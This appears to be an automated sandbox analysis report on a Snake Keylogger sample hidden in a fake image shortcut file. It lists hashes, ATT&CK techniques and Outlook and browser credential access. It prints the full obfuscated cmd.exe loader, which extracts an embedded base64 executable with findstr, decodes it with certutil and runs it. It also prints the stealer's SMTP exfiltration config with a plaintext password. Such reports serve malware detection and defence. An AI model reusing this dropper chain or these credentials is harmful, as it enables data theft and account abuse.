snakekeylogger | dc79a6058912f81a0b7f112dc83902fc482c9d7be12450c6911028ebd66a1bce

General

Target

Img-scan161023.lnk
Size

189KB
MD5

004667e1a9cb1ee8de89d34330a3d6df
SHA1

43563c2cc91b1070c064a7668e27dd9498a8954c
SHA256

dc79a6058912f81a0b7f112dc83902fc482c9d7be12450c6911028ebd66a1bce
SHA512

b027cd6a63614c1bd76fb5a68cc2e0469016b080836df8b251b6b45fae5bb7e7a8834bb70b5f1dca29539981c51f924684aa25b26be57803eb26a74be0e78f62
SSDEEP

3072:mPSEKR8itPqPiGjuyLAfOjRBM/JgQMHMJJActNlXrX:mP/KR8SZggG/SJgdOJ/Nh

Score

10^/10

snakekeylogger collection keylogger spyware stealer

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.avtorska.com.mk
Port:
587
Username:
[email protected]
Password:
avtorska2014@

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
mail.avtorska.com.mk
Port:
587
Username:
[email protected]
Password:
avtorska2014@
Email To:
[email protected]

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 4 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk	family_snakekeylogger
C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk	family_snakekeylogger
C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk	family_snakekeylogger
behavioral1/memory/2888-43-0x000000013F410000-0x000000013F436000-memory.dmp	family_snakekeylogger

Executes dropped EXE 1 IoCs

Processes:

8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

pid process

2888 8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

2612 cmd.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2888	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

pid	process
2612	cmd.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 checkip.dyndns.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

pid process

2888 8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
2888 8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

description pid process

Token: SeDebugPrivilege 2888 8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

flow	ioc
4	checkip.dyndns.org

pid	process
2888	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
2888	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

description	pid	process
Token: SeDebugPrivilege	2888	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 1096 wrote to memory of 2612	1096	cmd.exe	cmd.exe
PID 1096 wrote to memory of 2612	1096	cmd.exe	cmd.exe
PID 1096 wrote to memory of 2612	1096	cmd.exe	cmd.exe
PID 2612 wrote to memory of 2592	2612	cmd.exe	findstr.exe
PID 2612 wrote to memory of 2592	2612	cmd.exe	findstr.exe
PID 2612 wrote to memory of 2592	2612	cmd.exe	findstr.exe
PID 2612 wrote to memory of 2348	2612	cmd.exe	certutil.exe
PID 2612 wrote to memory of 2348	2612	cmd.exe	certutil.exe
PID 2612 wrote to memory of 2348	2612	cmd.exe	certutil.exe
PID 2612 wrote to memory of 2888	2612	cmd.exe	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
PID 2612 wrote to memory of 2888	2612	cmd.exe	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
PID 2612 wrote to memory of 2888	2612	cmd.exe	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

outlook_office_path 1 IoCs

Processes:

8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

outlook_win_path 1 IoCs

Processes:

8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Img-scan161023.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "5Gjnfd4d3QNufvx8YCkJ9bvzBuj9D2V9xEeAPtnwLn05q8iqSxBieR9yM5wM1EzopYAhI95naJeJwD2aaTe1Fl5wU3FXKsNrAEJJ7tcRYkcsCuIX3vVVNTnlifpCkkvWXw4iKb5flm23Tm5lw1d6kY0DnB4LsRsxDTvAhBYFuKndNcmgiQwwfBhdlH6m9w3WxTX4yRofHgkOdDbQXDqPh8NgmZ5bdFKm2OawlYzouiHaSZ1UJDUJ2dD4k5 & findstr "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAA" Img-scan161023.lnk>C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.tmp & certutil -decode C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.tmp C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk & start C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk & del C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.tmp & exit & 5Gjnfd4d3QNufvx8YCkJ9bvzBuj9D2V9xEeAPtnwLn05q8iqSxBieR9yM5wM1EzopYAhI95naJeJwD2aaTe1Fl5wU3FXKsNrAEJJ7tcRYkcsCuIX3vVVNTnlifpCkkvWXw4iKb5flm23Tm5lw1d6kY0DnB4LsRsxDTvAhBYFuKndNcmgiQwwfBhdlH6m9w3WxTX4yRofHgkOdDbQXDqPh8NgmZ5bdFKm2OawlYzouiHaSZ1UJDUJ2dD4k5"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2612

C:\Windows\system32\findstr.exe
findstr "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAA" Img-scan161023.lnk
3⤵
PID:2592

C:\Windows\system32\certutil.exe
certutil -decode C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.tmp C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
3⤵
PID:2348

C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk
3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

2

T1552

Credentials In Files

2

T1552.001

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

Filesize
139KB

MD5
68504fdedac71520aa3b8eba37fdae9b

SHA1
831aea37e298c64ad994aedaa69b4caae122eb3c

SHA256
57f31e6bd1e6732e06c90abd4b88d2e0e8c88287851f56d908184665480bfff4

SHA512
d0b7aa9bcc1b6c7b59ee095e95754b62033c80e7d961c536ab5d82d7f5641a8474df58b104f6bb4c5db754124a3f2c6c1b08808453ded8316a99b236a160a067

Download Submit
C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

Filesize
139KB

MD5
68504fdedac71520aa3b8eba37fdae9b

SHA1
831aea37e298c64ad994aedaa69b4caae122eb3c

SHA256
57f31e6bd1e6732e06c90abd4b88d2e0e8c88287851f56d908184665480bfff4

SHA512
d0b7aa9bcc1b6c7b59ee095e95754b62033c80e7d961c536ab5d82d7f5641a8474df58b104f6bb4c5db754124a3f2c6c1b08808453ded8316a99b236a160a067

Download Submit
C:\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.tmp

Filesize
186KB

MD5
e22740ac84d16043fce83d052e2cc391

SHA1
ca573054e4e717c7ed55ad6f895a8e5d4ccb36b6

SHA256
790213375ab5ae76cd8b290cae590d4ffafb0d5e4052fdeaf777c7746195ec27

SHA512
8a06d915a92cf014c2f214f9207c200400c582126dee82f19361cb376caeff5a04f7704ad13ecacc0d750a1fefc56de91d3cb47ef316ec97c4d3d9637a4a9dd2

Download Submit
\Users\Admin\AppData\Local\Temp\8b000fdd-ddee-4258-b597-9bc9dde73cec.lnk

Filesize
139KB

MD5
68504fdedac71520aa3b8eba37fdae9b

SHA1
831aea37e298c64ad994aedaa69b4caae122eb3c

SHA256
57f31e6bd1e6732e06c90abd4b88d2e0e8c88287851f56d908184665480bfff4

SHA512
d0b7aa9bcc1b6c7b59ee095e95754b62033c80e7d961c536ab5d82d7f5641a8474df58b104f6bb4c5db754124a3f2c6c1b08808453ded8316a99b236a160a067

Download Submit
memory/2888-43-0x000000013F410000-0x000000013F436000-memory.dmp

Filesize
152KB

Download
memory/2888-44-0x000007FEF5F90000-0x000007FEF697C000-memory.dmp

Filesize
9.9MB

Download
memory/2888-45-0x000000001BB40000-0x000000001BBC0000-memory.dmp

Filesize
512KB

Download
memory/2888-46-0x000007FEF5F90000-0x000007FEF697C000-memory.dmp

Filesize
9.9MB

Download
memory/2888-47-0x000000001BB40000-0x000000001BBC0000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads